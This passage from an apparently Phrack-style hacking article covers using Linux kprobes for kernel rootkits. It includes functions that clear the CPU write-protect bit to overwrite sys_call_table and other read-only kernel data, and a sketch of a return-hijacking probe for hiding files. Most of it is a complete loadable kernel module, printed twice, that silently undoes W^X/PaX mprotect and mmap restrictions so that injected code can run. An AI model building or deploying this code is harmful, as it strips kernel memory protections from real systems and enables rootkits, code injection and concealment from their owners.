cannot be patched using kprobe hooks themselves.
|
|
|
|
-- A simple patch within arch_prepare_kretprobe()
|
|
|
|
*sara = (unsigned long)&kretprobe_trampoline;
|
|
|
|
Could be changed to:
|
|
|
|
*sara = (unsigned long)&custom_asm_stub;
|
|
|
|
The problem is that arch_prepare_kretprobe() would have to be modified
|
|
using a technique alternate to kprobes, which is of course easy enough
|
|
but exceeds this papers scope. If you are interested in doing this the
|
|
next section will give you a trick that will be necessary in doing so.
|
|
|
|
|
|
----[ 2.5 - A quick stop into modifying read-only kernel segments
|
|
|
|
If you do feel interested in hijack arch_prepare_kretprobe()
|
|
using a function trampoline, do remember that modern intel CPU's
|
|
have the WRITE_PROTECT bit (cr0.wp) which prevents modifications to
|
|
read-only segments, so anytime you want to modify any data structure
|
|
that resides in .rodata you will need to use the function I provide
|
|
below to modify them. The following types of data structures often
|
|
exist in the kernels text segment:
|
|
|
|
1. void **sys_call_table
|
|
2. const struct file_operations <fs_fops_name>
|
|
3. const struct vm_ops <vma_vmops_name>
|
|
4. kernel functions
|
|
|
|
Data structures defined as 'const' will go into the .rodata section
|
|
which is at the end of the text segment, and the kernel code itself
|
|
generally exist in the .text section of the text segment. Attempting
|
|
writes to these locations will cause kernel freezes/panics/oops.
|
|
|
|
Some people modify the page table entry data for read-only pages they
|
|
want to modify, but the following functions I have provided are much
|
|
simpler, and an example will be provided below.
|
|
|
|
/* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */
|
|
static void disable_wp(void)
|
|
{
|
|
unsigned int cr0_value;
|
|
|
|
asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
|
|
|
|
/* Disable WP */
|
|
cr0_value &= ~(1 << 16);
|
|
|
|
asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
|
|
|
|
}
|
|
|
|
/* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */
|
|
static void enable_wp(void)
|
|
{
|
|
unsigned int cr0_value;
|
|
|
|
asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
|
|
|
|
/* Enable WP */
|
|
cr0_value |= (1 << 16);
|
|
|
|
asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
|
|
|
|
}
|
|
|
|
So if you wanted to modify a kernel function pointer that exists within
|
|
the text segment (If it is declared const) -- I.E the sys_call_table:
|
|
|
|
disable_wp();
|
|
sys_call_table[__NR_write] = (void *)n_sys_write;
|
|
enable_wp();
|
|
|
|
Or assuming you have a function that hijacks arch_prepare_kretprobe() using
|
|
the method discussed here [3]
|
|
|
|
disable_wp();
|
|
hijack_arch_prepare_kretprobe();
|
|
enable_wp();
|
|
|
|
|
|
You get the idea. But since we've fallen a bit off track lets move into
|
|
the next section which is actually more relative to the paper.
|
|
|
|
|
|
----[ 2.6 - An idea for a kretprobe implementation for hackers
|
|
|
|
|
|
The primary restriction in patching the kernels should be obvious by now.
|
|
We CANNOT modify the return value in return probes (kretprobes). If someone
|
|
felt so inclined, they could (in an LKM) implement something very similar to
|
|
the kretprobe implementation. This would allow us to instrument the kernel
|
|
using kprobes and modify the return value -- therefore easily patching
|
|
functions like filldir64 which would allow us to simply use our special
|
|
kretprobe implementation to 'return 0' if the 'char *d_name' matched a
|
|
file we wanted to hide.
|
|
|
|
If the reader studies /usr/src/linux/kernel/kprobes.c after reading the
|
|
above section on kretprobe implementation, it becomes apparent that a
|
|
more flexible kretprobe implementation could be designed. This is hardly
|
|
non-trivial if the reader followed this paper in its entirety. I simply
|
|
did not have enough time to design this feature -- a kretprobe for hackers
|
|
that allows control of the return value. Lets call this feature 'rpe'
|
|
(Return probe elite) the BASIC schematics would look like:
|
|
|
|
int register_rpe(struct kretprobe *rp)
|
|
{
|
|
|
|
... <code> ...
|
|
rp->kp.pre_handler = pre_handler_rpe;
|
|
... <code> ...
|
|
}
|
|
|
|
static int pre_handler_rpe(struct kprobe *p,
|
|
struct pt_regs *regs)
|
|
{
|
|
arch_prepare_rpe(regs);
|
|
|
|
}
|
|
|
|
|
|
void arch_prepare_rpe(struct pt_regs *regs)
|
|
{
|
|
|
|
unsigned long *ret = stack_addr(regs);
|
|
|
|
ret_addr = (kprobe_opcode_t *) *sara;
|
|
|
|
/* Replace the return addr with trampoline addr */
|
|
*ret = (unsigned long) &rpe_trampoline;
|
|
}
|
|
|
|
rpe_trampoline could be either an asm stub or an actual
|
|
function -- either way you would want to backup the registers
|
|
before calling your handler that does what you want --
|
|
to process data and ultimately return whatever value you want
|
|
For instance:
|
|
__asm__ ("movl $val, %eax\n"
|
|
"push $ret_addr\n"
|
|
"ret");
|
|
|
|
Since I did not provide an implementation for a more flexible
|
|
kretprobe, the reader may be interested in doing so. Once I
|
|
get an opportunity I intend on writing an LKM patch for one
|
|
and releasing it.
|
|
|
|
|
|
---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions)
|
|
|
|
Lets move on to a couple of other patches using the existing
|
|
kprobe features to show some usefulness other than a file hiding
|
|
mechanism. These two patches will aim at disabling the W^X feature
|
|
that is enabled in kernels -- PaX for instance calls this mprotect
|
|
restrictions. W^X is to say that an mmap segment cannot be created
|
|
or modified to be both write+execute. The patches below give us
|
|
two benefits:
|
|
|
|
1. On systems with the NX (no_exec_pages) bit set, we will be able
|
|
to do things like mark the data segment as executable and inject
|
|
code there for execution using ptrace.
|
|
|
|
2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.) store the
|
|
encrypted executable in the text segment of the stub/loading code
|
|
and to decrypt part of a programs own text, would be considered self
|
|
modifying code -- W^X prevents this -- so with our Anti-W^X patch
|
|
we can use our ELF Protectors, and make segments such as the stack
|
|
and data segment, once again, executable on systems with the NX bit set
|
|
where mprotect/mmap restrictions really make a difference.
|
|
|
|
An important note is that due to the design nature of the following
|
|
patch, we cannot change the return values; so mprotect and mmap
|
|
will both give a return value that says they failed-- don't exit
|
|
based on error checking because your write+execute mmap and mprotect
|
|
attempts actually succeed. To test you can look at /proc/pid/maps
|
|
of the given process.
|
|
|
|
-- tested on 2.6.18 --
|
|
|
|
On modern systems simply change regs->eax to regs->ax in the two necessary spots.
|
|
Also exporting the module license to GPL is not necessary to use kprobes on modern
|
|
systems.
|
|
|
|
#include <linux/kernel.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kprobes.h>
|
|
#include <linux/mm.h>
|
|
#include <linux/fs.h>
|
|
#include <linux/file.h>
|
|
|
|
|
|
#define PROT_READ 0x1 /* Page can be read. */
|
|
#define PROT_WRITE 0x2 /* Page can be written. */
|
|
#define PROT_EXEC 0x4 /* Page can be executed. */
|
|
#define PROT_NONE 0x0 /* Page can not be accessed. */
|
|
#define MAP_FIXED 0x10
|
|
|
|
#define MAP_ANONYMOUS 0x20 /* don't use a file */
|
|
#define MAP_GROWSDOWN 0x0100 /* stack-like segment */
|
|
#define MAP_DENYWRITE 0x0800 /* ETXTBSY */
|
|
#define MAP_EXECUTABLE 0x1000 /* mark it as an executable */
|
|
|
|
/*
|
|
* It is preferable to write a script that gets
|
|
* kallsyms_lookup_name() from System.map and then
|
|
* passes it as a module parameter, but in this example
|
|
* we just look it up and assign it our selves, so
|
|
* make sure to change the address.
|
|
*/
|
|
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this
|
|
|
|
unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
|
|
unsigned long pgoff, unsigned long flags);
|
|
|
|
|
|
static struct
|
|
{
|
|
int assign_wx;
|
|
unsigned long start;
|
|
size_t len;
|
|
long prot;
|
|
} mprotect;
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
mprotect.assign_wx = 0;
|
|
mprotect.start = start;
|
|
mprotect.prot = prot;
|
|
|
|
/* This doesn't concern us */
|
|
if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
|
|
goto out;
|
|
|
|
down_write(¤t->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, start);
|
|
if (!vma)
|
|
goto free_sem;
|
|
|
|
if (prot & (PROT_WRITE|PROT_EXEC))
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_WRITE)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_EXEC)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
free_sem:
|
|
up_write(¤t->mm->mmap_sem);
|
|
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/*
|
|
before the following function is executed, a W^X patch such as PaX
|
|
mprotect/mmap restrictions, will have code such as:
|
|
if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
|
|
vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
|
|
else
|
|
vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
|
|
|
|
But our return probe gets the last say in the matter. mprotect
|
|
will return like it failed (With a positive value) but the VMA's
|
|
or memory maps will be both write+execute, just make sure that
|
|
you don't error checking then exit if mprotect or mmap fail
|
|
because they will return failed values.
|
|
*/
|
|
|
|
static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma;
|
|
|
|
if (!mprotect.assign_wx)
|
|
goto out;
|
|
|
|
down_write(¤t->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, mprotect.start);
|
|
if (!vma)
|
|
goto sem_out;
|
|
|
|
if (mprotect.prot & PROT_EXEC)
|
|
{
|
|
vma->vm_flags |= VM_MAYEXEC;
|
|
vma->vm_flags |= VM_EXEC;
|
|
}
|
|
|
|
if (mprotect.prot & PROT_WRITE)
|
|
{
|
|
vma->vm_flags |= VM_MAYWRITE;
|
|
vma->vm_flags |= VM_WRITE;
|
|
}
|
|
|
|
sem_out:
|
|
up_write(¤t->mm->mmap_sem);
|
|
|
|
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
struct
|
|
{
|
|
unsigned long addr;
|
|
#define MMAP_CLEAN 0
|
|
#define MMAP_DIRTY 1
|
|
int mmap_prot_state;
|
|
unsigned int len;
|
|
} do_mmap_data;
|
|
|
|
/* Return probe code for sys_mmap2 */
|
|
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
/* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
|
|
if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
|
|
do_mmap_data.addr = regs->eax;
|
|
else
|
|
goto out; // pretty unlikely
|
|
|
|
switch(do_mmap_data.mmap_prot_state)
|
|
{
|
|
case MMAP_CLEAN:
|
|
break;
|
|
case MMAP_DIRTY: // lets undo the work of the W^X patch :)
|
|
down_write(¤t->mm->mmap_sem);
|
|
vma = find_vma(current->mm, do_mmap_data.addr);
|
|
if (!vma)
|
|
break;
|
|
printk("Found vma's and setting all writes and exec possibilities\n");
|
|
vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
|
|
vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
|
|
up_write(¤t->mm->mmap_sem);
|
|
break;
|
|
}
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
|
|
unsigned long fd, unsigned long pgoff)
|
|
{
|
|
|
|
struct file *file = NULL;
|
|
|
|
printk("In sys_mmap2\n");
|
|
do_mmap_data.len = len;
|
|
|
|
/* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
|
|
|
|
/* This is the easiest scenario */
|
|
/* because we know the mmap addr */
|
|
if (flags & MAP_FIXED)
|
|
{
|
|
printk("MAP_FIXED\n");
|
|
do_mmap_data.addr = addr;
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
goto out;
|
|
}
|
|
|
|
flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
|
|
if (!(flags & MAP_ANONYMOUS))
|
|
{
|
|
file = fget(fd);
|
|
if (!file)
|
|
goto out;
|
|
}
|
|
|
|
/* mimick do_mmap_pgoff to get the linear range */
|
|
down_write(¤t->mm->mmap_sem);
|
|
|
|
if (file)
|
|
{
|
|
if (!file->f_op || !file->f_op->mmap)
|
|
goto sem_out;
|
|
}
|
|
|
|
if (!len)
|
|
goto sem_out;
|
|
|
|
len = PAGE_ALIGN(len);
|
|
if (!len || len > TASK_SIZE)
|
|
goto sem_out;
|
|
|
|
if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
|
|
goto sem_out;
|
|
|
|
/* when the real sys_mmap2/do_mmap_pgoff are called
|
|
* they will get the next linear range
|
|
* which will be at do_mmap_data.addr - do_mmap_data.len
|
|
* This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown()
|
|
*/
|
|
printk("get_unmapped_area call\n");
|
|
addr = _get_unmapped_area(file, addr, len, 0, flags);
|
|
printk("addr: 0x%lx\n", addr);
|
|
do_mmap_data.addr = addr;
|
|
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
|
|
sem_out:
|
|
up_write(¤t->mm->mmap_sem);
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
|
|
}
|
|
|
|
static struct jprobe sys_mmap2_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mmap2
|
|
};
|
|
|
|
static struct jprobe sys_mprotect_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mprotect
|
|
};
|
|
|
|
static struct kretprobe mprotect_kretprobe =
|
|
{
|
|
.handler = rp_mprotect,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
static struct kretprobe mmap_kretprobe =
|
|
{
|
|
.handler = rp_mmap,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
|
|
void exit_module(void)
|
|
{
|
|
unregister_jprobe(&sys_mmap2_jprobe);
|
|
unregister_jprobe(&sys_mprotect_jprobe);
|
|
|
|
unregister_kretprobe(&mprotect_kretprobe);
|
|
unregister_kretprobe(&mmap_kretprobe);
|
|
}
|
|
|
|
int init_module(void)
|
|
{
|
|
int j = 0, k = 0;
|
|
|
|
_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
|
|
|
|
sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
/* Register our jprobes */
|
|
if (register_jprobe(&sys_mmap2_jprobe) < 0)
|
|
goto jfail;
|
|
j++;
|
|
|
|
sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
if (register_jprobe(&sys_mprotect_jprobe) < 0)
|
|
goto jfail;
|
|
|
|
mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
/* Register our kretprobes */
|
|
if (register_kretprobe(&mprotect_kretprobe) < 0)
|
|
goto kfail;
|
|
k++;
|
|
|
|
mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
if (register_kretprobe(&mmap_kretprobe) < 0)
|
|
goto kfail;
|
|
|
|
return 0;
|
|
|
|
jfail:
|
|
|
|
printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
|
|
kfail:
|
|
printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));
|
|
|
|
return -1;
|
|
}
|
|
|
|
|
|
module_exit(exit_module);
|
|
|
|
--- end of code ---
|
|
|
|
|
|
---[ 4 - Notes on rootkit detection for kprobes
|
|
|
|
If a kernel rootkit is designed soley using kprobes and properly hides
|
|
itself from the kprobe entries in sysfs, then a rootkit detection program
|
|
can still easily detect what kernel functions have been hooked. I will
|
|
leave this obvious solution to anyone interested in adding this feature
|
|
to their detectors but the answer lies in this paper as well as the kprobe
|
|
documentation.
|
|
|
|
|
|
---[ 5 - Summing it all up
|
|
|
|
We have seen that the kprobe interface, which is primarily implemented
|
|
for kernel debugging can be used to instrument the kernel in some
|
|
interesting ways. We have explored kprobes strengths, weaknesses, and provided
|
|
several examples of weakening the kernel by patching it using jprobe and
|
|
kretprobe techniques. We also went over some ideas for implementing a more
|
|
hacker friendly kretprobe implementation (Although we did not provide one).
|
|
|
|
It is also important to mention to people who are engineering security code
|
|
that kprobes can also be used to debug kernel code, as well as install simple
|
|
patches for hardening the kernel. But phrack isn't about that, so patches
|
|
to harden the kernel were not included -- just know that it is possible.
|
|
|
|
|
|
---[ 6 - Greetz
|
|
|
|
kad - thanks for encouraging me to write this, and being cool guy with
|
|
priceless skills and good advice.
|
|
|
|
Silvio - My initial inspiration for kernel and ELF hacking all started with you.
|
|
You've been a good friend and mentor, many many thanks.
|
|
|
|
chrak - My long time friend and occasional coding partner. 13yrs ago this guy
|
|
helped me write my first backdoor program for Linux.
|
|
|
|
nynex - I owe you for hosting my stuff and being a good friend.
|
|
|
|
mayhem - For writing some really cool ELF code and being an inspiration.
|
|
|
|
grugq - Your original AF work has been an inspiration as well.
|
|
|
|
halfdead - For knowing everything about the universe and our realm *literally*
|
|
|
|
jimjones (UNIX Terrorist) - you will be getting a copy of this soon, word.
|
|
|
|
All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh.
|
|
|
|
#bitlackeys on EFnet, a small and strange little channel with people whom
|
|
I've been friends with for years.
|
|
|
|
#formal on a secret network with extremely smart people and good conversation.
|
|
|
|
RuxCon folk are pretty much all awesome too, thanks.
|
|
|
|
|
|
---[ 7 - References
|
|
|
|
Please note that I did not use any references other than code and official
|
|
documentation for this paper, but the following papers are quite relevant and
|
|
since I have read them (along with many other great papers) they all play a
|
|
role in my collective knowledge of kernel malware and rootkit exploration.
|
|
|
|
[1] kad - Handling interrupt descriptor table for fun and profit
|
|
http://www.phrack.org/issues.html?issue=59&id=4#article
|
|
|
|
[2] Halfdead - Mystifying the debugger for ultimate stealthness
|
|
http://www.phrack.org/issues.html?issue=65&id=8#article
|
|
|
|
[3] Silvio - Kernel function hijacking (Function trampolines)
|
|
http://vxheavens.com/lib/vsc08.html
|
|
|
|
|
|
---[ 8 - Code
|
|
|
|
/*
|
|
Tested on 2.6.18 kernel, on modern kernels change regs->eax to regs->ax.
|
|
From the ElfMaster, 2010.
|
|
|
|
Makefile:
|
|
|
|
obj-m += w_plus_x.o
|
|
|
|
MODULES = w_plus_x.ko
|
|
|
|
all: clean $(MODULES)
|
|
|
|
$(MODULES):
|
|
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
|
|
|
|
clean:
|
|
rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order
|
|
|
|
|
|
*/
|
|
|
|
|
|
#include <linux/kernel.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kprobes.h>
|
|
#include <linux/mm.h>
|
|
#include <linux/fs.h>
|
|
#include <linux/file.h>
|
|
|
|
|
|
#define PROT_READ 0x1 /* Page can be read. */
|
|
#define PROT_WRITE 0x2 /* Page can be written. */
|
|
#define PROT_EXEC 0x4 /* Page can be executed. */
|
|
#define PROT_NONE 0x0 /* Page can not be accessed. */
|
|
#define MAP_FIXED 0x10
|
|
|
|
#define MAP_ANONYMOUS 0x20 /* don't use a file */
|
|
#define MAP_GROWSDOWN 0x0100 /* stack-like segment */
|
|
#define MAP_DENYWRITE 0x0800 /* ETXTBSY */
|
|
#define MAP_EXECUTABLE 0x1000 /* mark it as an executable */
|
|
|
|
/*
|
|
* It is preferable to write a script that gets
|
|
* kallsyms_lookup_name() from System.map and then
|
|
* passes it as a module parameter, but in this example
|
|
* we just look it up and assign it our selves, so
|
|
* make sure to change the address.
|
|
*/
|
|
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this
|
|
|
|
unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
|
|
unsigned long pgoff, unsigned long flags);
|
|
|
|
|
|
static struct
|
|
{
|
|
int assign_wx;
|
|
unsigned long start;
|
|
size_t len;
|
|
long prot;
|
|
} mprotect;
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
mprotect.assign_wx = 0;
|
|
mprotect.start = start;
|
|
mprotect.prot = prot;
|
|
|
|
/* This doesn't concern us */
|
|
if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
|
|
goto out;
|
|
|
|
down_write(¤t->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, start);
|
|
if (!vma)
|
|
goto free_sem;
|
|
|
|
if (prot & (PROT_WRITE|PROT_EXEC))
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_WRITE)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_EXEC)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
free_sem:
|
|
up_write(¤t->mm->mmap_sem);
|
|
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/*
|
|
before the following function is executed, a W^X patch such as PaX
|
|
mprotect/mmap restrictions, will have code such as:
|
|
if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
|
|
vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
|
|
else
|
|
vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
|
|
|
|
But our return probe gets the last say in the matter. mprotect
|
|
will return like it failed (With a positive value) but the VMA's
|
|
or memory maps will be both write+execute, just make sure that
|
|
you don't error checking then exit if mprotect or mmap fail
|
|
because they will return failed values.
|
|
*/
|
|
|
|
static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma;
|
|
|
|
if (!mprotect.assign_wx)
|
|
goto out;
|
|
|
|
down_write(¤t->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, mprotect.start);
|
|
if (!vma)
|
|
goto sem_out;
|
|
|
|
if (mprotect.prot & PROT_EXEC)
|
|
{
|
|
vma->vm_flags |= VM_MAYEXEC;
|
|
vma->vm_flags |= VM_EXEC;
|
|
}
|
|
|
|
if (mprotect.prot & PROT_WRITE)
|
|
{
|
|
vma->vm_flags |= VM_MAYWRITE;
|
|
vma->vm_flags |= VM_WRITE;
|
|
}
|
|
|
|
sem_out:
|
|
up_write(¤t->mm->mmap_sem);
|
|
|
|
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
struct
|
|
{
|
|
unsigned long addr;
|
|
#define MMAP_CLEAN 0
|
|
#define MMAP_DIRTY 1
|
|
int mmap_prot_state;
|
|
unsigned int len;
|
|
} do_mmap_data;
|
|
|
|
/* Return probe code for sys_mmap2 */
|
|
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
/* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
|
|
if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
|
|
do_mmap_data.addr = regs->eax;
|
|
else
|
|
goto out; // pretty unlikely
|
|
|
|
switch(do_mmap_data.mmap_prot_state)
|
|
{
|
|
case MMAP_CLEAN:
|
|
break;
|
|
case MMAP_DIRTY: // lets undo the work of the W^X patch :)
|
|
down_write(¤t->mm->mmap_sem);
|
|
vma = find_vma(current->mm, do_mmap_data.addr);
|
|
if (!vma)
|
|
break;
|
|
printk("Found vma's and setting all writes and exec possibilities\n");
|
|
vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
|
|
vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
|
|
up_write(¤t->mm->mmap_sem);
|
|
break;
|
|
}
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
|
|
unsigned long fd, unsigned long pgoff)
|
|
{
|
|
|
|
struct file *file = NULL;
|
|
|
|
printk("In sys_mmap2\n");
|
|
do_mmap_data.len = len;
|
|
|
|
/* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
|
|
|
|
/* This is the easiest scenario */
|
|
/* because we know the mmap addr */
|
|
if (flags & MAP_FIXED)
|
|
{
|
|
printk("MAP_FIXED\n");
|
|
do_mmap_data.addr = addr;
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
goto out;
|
|
}
|
|
|
|
flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
|
|
if (!(flags & MAP_ANONYMOUS))
|
|
{
|
|
file = fget(fd);
|
|
if (!file)
|
|
goto out;
|
|
}
|
|
|
|
/* mimick do_mmap_pgoff to get the linear range */
|
|
down_write(¤t->mm->mmap_sem);
|
|
|
|
if (file)
|
|
{
|
|
if (!file->f_op || !file->f_op->mmap)
|
|
goto sem_out;
|
|
}
|
|
|
|
if (!len)
|
|
goto sem_out;
|
|
|
|
len = PAGE_ALIGN(len);
|
|
if (!len || len > TASK_SIZE)
|
|
goto sem_out;
|
|
|
|
if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
|
|
goto sem_out;
|
|
|
|
/* when the real sys_mmap2/do_mmap_pgoff are called
|
|
* they will get the next linear range
|
|
* which will be at do_mmap_data.addr - do_mmap_data.len
|
|
* This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown()
|
|
*/
|
|
printk("get_unmapped_area call\n");
|
|
addr = _get_unmapped_area(file, addr, len, 0, flags);
|
|
printk("addr: 0x%lx\n", addr);
|
|
do_mmap_data.addr = addr;
|
|
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
|
|
sem_out:
|
|
up_write(¤t->mm->mmap_sem);
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
|
|
}
|
|
|
|
static struct jprobe sys_mmap2_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mmap2
|
|
};
|
|
|
|
static struct jprobe sys_mprotect_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mprotect
|
|
};
|
|
|
|
static struct kretprobe mprotect_kretprobe =
|
|
{
|
|
.handler = rp_mprotect,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
static struct kretprobe mmap_kretprobe =
|
|
{
|
|
.handler = rp_mmap,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
|
|
void exit_module(void)
|
|
{
|
|
unregister_jprobe(&sys_mmap2_jprobe);
|
|
unregister_jprobe(&sys_mprotect_jprobe);
|
|
|
|
unregister_kretprobe(&mprotect_kretprobe);
|
|
unregister_kretprobe(&mmap_kretprobe);
|
|
}
|
|
|
|
int init_module(void)
|
|
{
|
|
int j = 0, k = 0;
|
|
|
|
_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
|
|
|
|
sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
/* Register our jprobes */
|
|
if (register_jprobe(&sys_mmap2_jprobe) < 0)
|
|
goto jfail;
|
|
j++;
|
|
|
|
sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
if (register_jprobe(&sys_mprotect_jprobe) < 0)
|
|
goto jfail;
|
|
|
|
mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
/* Register our kretprobes */
|
|
if (register_kretprobe(&mprotect_kretprobe) < 0)
|
|
goto kfail;
|
|
k++;
|
|
|
|
mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
if (register_kretprobe(&mmap_kretprobe) < 0)
|
|
goto kfail;
|
|
|
|
return 0;
|
|
|
|
jfail:
|
|
|
|
printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
|
|
kfail:
|
|
printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));
|
|
|
|
return -1;
|
|
}
|
|
|
|
|
|
module_exit(exit_module);
|
|
|
|
----EOF----
|